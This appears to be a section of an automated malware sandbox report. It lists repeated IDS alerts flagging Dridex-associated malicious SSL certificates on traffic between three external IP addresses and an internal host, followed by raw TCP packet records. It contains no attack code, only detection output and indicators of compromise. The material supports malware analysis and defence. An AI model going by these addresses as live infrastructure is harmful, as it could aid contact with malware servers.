01/11/21-16:53:08.533597	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49263	77.220.64.37	192.168.2.22
01/11/21-16:53:09.070760	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49264	80.86.91.27	192.168.2.22
01/11/21-16:53:09.589266	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49265	5.100.228.233	192.168.2.22
01/11/21-16:53:09.589266	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49265	5.100.228.233	192.168.2.22
01/11/21-16:53:10.686744	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49267	77.220.64.37	192.168.2.22
01/11/21-16:53:11.289830	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49268	80.86.91.27	192.168.2.22
01/11/21-16:53:12.480016	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49269	5.100.228.233	192.168.2.22
01/11/21-16:53:12.480016	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49269	5.100.228.233	192.168.2.22
01/11/21-16:53:13.591595	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49271	77.220.64.37	192.168.2.22
01/11/21-16:53:14.097596	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49272	80.86.91.27	192.168.2.22
01/11/21-16:53:14.618831	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49273	5.100.228.233	192.168.2.22
01/11/21-16:53:14.618831	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49273	5.100.228.233	192.168.2.22
01/11/21-16:53:15.664872	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49275	77.220.64.37	192.168.2.22
01/11/21-16:53:16.206337	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49276	80.86.91.27	192.168.2.22
01/11/21-16:53:16.742400	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49277	5.100.228.233	192.168.2.22
01/11/21-16:53:16.742400	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49277	5.100.228.233	192.168.2.22
01/11/21-16:53:17.771725	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49279	77.220.64.37	192.168.2.22
01/11/21-16:53:18.300834	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49280	80.86.91.27	192.168.2.22
01/11/21-16:53:18.829975	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49281	5.100.228.233	192.168.2.22
01/11/21-16:53:18.829975	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49281	5.100.228.233	192.168.2.22
01/11/21-16:53:19.877722	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49283	77.220.64.37	192.168.2.22
01/11/21-16:53:20.406206	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49284	80.86.91.27	192.168.2.22
01/11/21-16:53:20.953401	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49285	5.100.228.233	192.168.2.22
01/11/21-16:53:20.953401	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49285	5.100.228.233	192.168.2.22
01/11/21-16:53:22.025923	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49287	77.220.64.37	192.168.2.22
01/11/21-16:53:22.557124	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49288	80.86.91.27	192.168.2.22
01/11/21-16:53:23.087072	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49289	5.100.228.233	192.168.2.22
01/11/21-16:53:23.087072	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49289	5.100.228.233	192.168.2.22
01/11/21-16:53:24.154861	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49291	77.220.64.37	192.168.2.22
01/11/21-16:53:24.681751	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49292	80.86.91.27	192.168.2.22
01/11/21-16:53:25.220703	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49293	5.100.228.233	192.168.2.22
01/11/21-16:53:25.220703	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49293	5.100.228.233	192.168.2.22
01/11/21-16:53:26.273280	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49295	77.220.64.37	192.168.2.22
01/11/21-16:53:26.788529	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49296	80.86.91.27	192.168.2.22
01/11/21-16:53:27.299104	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49297	5.100.228.233	192.168.2.22
01/11/21-16:53:27.299104	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49297	5.100.228.233	192.168.2.22
01/11/21-16:53:28.460499	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49299	77.220.64.37	192.168.2.22
01/11/21-16:53:28.993884	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49300	80.86.91.27	192.168.2.22
01/11/21-16:53:29.979511	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49301	5.100.228.233	192.168.2.22
01/11/21-16:53:29.979511	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49301	5.100.228.233	192.168.2.22
01/11/21-16:53:31.065753	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49303	77.220.64.37	192.168.2.22
01/11/21-16:53:31.590186	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49304	80.86.91.27	192.168.2.22
01/11/21-16:53:32.131234	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49305	5.100.228.233	192.168.2.22
01/11/21-16:53:32.131234	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49305	5.100.228.233	192.168.2.22
01/11/21-16:53:33.173336	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49307	77.220.64.37	192.168.2.22
01/11/21-16:53:33.695474	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49308	80.86.91.27	192.168.2.22
01/11/21-16:53:34.215381	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49309	5.100.228.233	192.168.2.22
01/11/21-16:53:34.215381	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49309	5.100.228.233	192.168.2.22
01/11/21-16:53:35.263087	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49311	77.220.64.37	192.168.2.22
01/11/21-16:53:35.795245	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49312	80.86.91.27	192.168.2.22
01/11/21-16:53:36.329124	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49313	5.100.228.233	192.168.2.22
01/11/21-16:53:36.329124	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49313	5.100.228.233	192.168.2.22
01/11/21-16:53:37.383411	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49315	77.220.64.37	192.168.2.22
01/11/21-16:53:37.905898	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49316	80.86.91.27	192.168.2.22
01/11/21-16:53:38.441252	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49317	5.100.228.233	192.168.2.22
01/11/21-16:53:38.441252	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49317	5.100.228.233	192.168.2.22
01/11/21-16:53:39.461968	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49319	77.220.64.37	192.168.2.22
01/11/21-16:53:39.969979	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49320	80.86.91.27	192.168.2.22
01/11/21-16:53:40.489105	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49321	5.100.228.233	192.168.2.22
01/11/21-16:53:40.489105	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49321	5.100.228.233	192.168.2.22
01/11/21-16:53:41.537757	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49323	77.220.64.37	192.168.2.22
01/11/21-16:53:42.058567	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49324	80.86.91.27	192.168.2.22
01/11/21-16:53:42.577964	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49325	5.100.228.233	192.168.2.22
01/11/21-16:53:42.577964	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49325	5.100.228.233	192.168.2.22
01/11/21-16:53:43.624651	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49327	77.220.64.37	192.168.2.22
01/11/21-16:53:44.149962	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49328	80.86.91.27	192.168.2.22
01/11/21-16:53:44.671597	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49329	5.100.228.233	192.168.2.22
01/11/21-16:53:44.671597	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49329	5.100.228.233	192.168.2.22
01/11/21-16:53:45.731394	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49331	77.220.64.37	192.168.2.22
01/11/21-16:53:46.248760	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49332	80.86.91.27	192.168.2.22
01/11/21-16:53:46.760255	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49333	5.100.228.233	192.168.2.22
01/11/21-16:53:46.760255	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49333	5.100.228.233	192.168.2.22
01/11/21-16:53:47.811931	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49335	77.220.64.37	192.168.2.22
01/11/21-16:53:48.352790	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49336	80.86.91.27	192.168.2.22
01/11/21-16:53:48.895951	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49337	5.100.228.233	192.168.2.22
01/11/21-16:53:48.895951	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49337	5.100.228.233	192.168.2.22
01/11/21-16:53:49.944209	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49339	77.220.64.37	192.168.2.22
01/11/21-16:53:50.465479	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49340	80.86.91.27	192.168.2.22
01/11/21-16:53:50.979923	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49341	5.100.228.233	192.168.2.22
01/11/21-16:53:50.979923	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49341	5.100.228.233	192.168.2.22
01/11/21-16:53:52.017842	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49343	77.220.64.37	192.168.2.22
01/11/21-16:53:52.547515	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49344	80.86.91.27	192.168.2.22
01/11/21-16:53:53.073637	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49345	5.100.228.233	192.168.2.22
01/11/21-16:53:53.073637	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49345	5.100.228.233	192.168.2.22
01/11/21-16:53:54.124472	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49347	77.220.64.37	192.168.2.22
01/11/21-16:53:54.663698	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49348	80.86.91.27	192.168.2.22
01/11/21-16:53:55.181428	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49349	5.100.228.233	192.168.2.22
01/11/21-16:53:55.181428	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49349	5.100.228.233	192.168.2.22
01/11/21-16:53:56.212049	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49351	77.220.64.37	192.168.2.22
01/11/21-16:53:56.738042	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49352	80.86.91.27	192.168.2.22
01/11/21-16:53:57.254622	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49353	5.100.228.233	192.168.2.22
01/11/21-16:53:57.254622	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49353	5.100.228.233	192.168.2.22
01/11/21-16:53:58.309088	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49355	77.220.64.37	192.168.2.22
01/11/21-16:53:58.833192	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49356	80.86.91.27	192.168.2.22
01/11/21-16:53:59.380269	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49357	5.100.228.233	192.168.2.22
01/11/21-16:53:59.380269	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49357	5.100.228.233	192.168.2.22
01/11/21-16:54:00.425839	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49359	77.220.64.37	192.168.2.22
01/11/21-16:54:00.956000	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49360	80.86.91.27	192.168.2.22
01/11/21-16:54:01.490066	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49361	5.100.228.233	192.168.2.22
01/11/21-16:54:01.490066	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49361	5.100.228.233	192.168.2.22
01/11/21-16:54:02.562264	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49363	77.220.64.37	192.168.2.22
01/11/21-16:54:03.076683	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49364	80.86.91.27	192.168.2.22
01/11/21-16:54:03.639232	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49365	5.100.228.233	192.168.2.22
01/11/21-16:54:03.639232	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49365	5.100.228.233	192.168.2.22
01/11/21-16:54:04.685773	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49367	77.220.64.37	192.168.2.22
01/11/21-16:54:05.266596	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49368	80.86.91.27	192.168.2.22
01/11/21-16:54:05.824689	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49369	5.100.228.233	192.168.2.22
01/11/21-16:54:05.824689	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49369	5.100.228.233	192.168.2.22
01/11/21-16:54:06.915022	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49371	77.220.64.37	192.168.2.22
01/11/21-16:54:07.442169	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49372	80.86.91.27	192.168.2.22
01/11/21-16:54:07.979603	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49373	5.100.228.233	192.168.2.22
01/11/21-16:54:07.979603	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49373	5.100.228.233	192.168.2.22
01/11/21-16:54:09.038178	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49375	77.220.64.37	192.168.2.22
01/11/21-16:54:09.562314	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49376	80.86.91.27	192.168.2.22
01/11/21-16:54:10.086554	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49377	5.100.228.233	192.168.2.22
01/11/21-16:54:10.086554	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49377	5.100.228.233	192.168.2.22
01/11/21-16:54:11.129117	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49379	77.220.64.37	192.168.2.22
01/11/21-16:54:11.653223	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49380	80.86.91.27	192.168.2.22
01/11/21-16:54:12.165487	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49381	5.100.228.233	192.168.2.22
01/11/21-16:54:12.165487	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49381	5.100.228.233	192.168.2.22
01/11/21-16:54:13.204226	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49383	77.220.64.37	192.168.2.22
01/11/21-16:54:13.732197	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49384	80.86.91.27	192.168.2.22
01/11/21-16:54:14.253442	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49385	5.100.228.233	192.168.2.22
01/11/21-16:54:14.253442	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49385	5.100.228.233	192.168.2.22
01/11/21-16:54:15.298644	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49387	77.220.64.37	192.168.2.22
01/11/21-16:54:15.838118	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49388	80.86.91.27	192.168.2.22
01/11/21-16:54:16.388703	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49389	5.100.228.233	192.168.2.22
01/11/21-16:54:16.388703	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49389	5.100.228.233	192.168.2.22
01/11/21-16:54:17.447758	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49391	77.220.64.37	192.168.2.22
01/11/21-16:54:17.972143	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49392	80.86.91.27	192.168.2.22
01/11/21-16:54:18.475582	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49393	5.100.228.233	192.168.2.22
01/11/21-16:54:18.475582	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49393	5.100.228.233	192.168.2.22
01/11/21-16:54:19.528350	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49395	77.220.64.37	192.168.2.22
01/11/21-16:54:20.046162	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49396	80.86.91.27	192.168.2.22
01/11/21-16:54:20.560146	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49397	5.100.228.233	192.168.2.22
01/11/21-16:54:20.560146	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49397	5.100.228.233	192.168.2.22
01/11/21-16:54:21.581721	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49399	77.220.64.37	192.168.2.22
01/11/21-16:54:22.092958	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49400	80.86.91.27	192.168.2.22
01/11/21-16:54:22.641848	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49401	5.100.228.233	192.168.2.22
01/11/21-16:54:22.641848	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49401	5.100.228.233	192.168.2.22
01/11/21-16:54:23.702207	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49403	77.220.64.37	192.168.2.22
01/11/21-16:54:24.228107	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49404	80.86.91.27	192.168.2.22
01/11/21-16:54:24.755334	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49405	5.100.228.233	192.168.2.22
01/11/21-16:54:24.755334	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49405	5.100.228.233	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2021 16:52:11.383333921 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.432667017 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.432809114 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.434149027 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.483485937 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.492672920 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.492796898 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.493716955 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.493798018 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.495330095 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.495413065 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.497365952 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.497448921 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.505867958 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.505944967 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.505964994 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.506021976 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.506048918 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.506102085 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.506277084 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.506331921 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.516563892 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.516658068 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.516774893 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.516839981 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.542587042 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.542685986 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.542700052 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.542776108 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.543279886 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.543344975 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.543462038 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.543524981 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.545084953 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.545171976 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.545243025 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.545317888 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.555166006 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.555233955 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.555289030 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.555347919 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.555543900 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.555597067 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.555653095 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.555692911 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.555713892 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.555728912 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.555738926 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.555774927 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.555783987 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.555816889 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.555830956 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.555862904 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.565701008 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.565742016 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.565773010 CET	49167	80	192.168.2.22	160.153.133.116
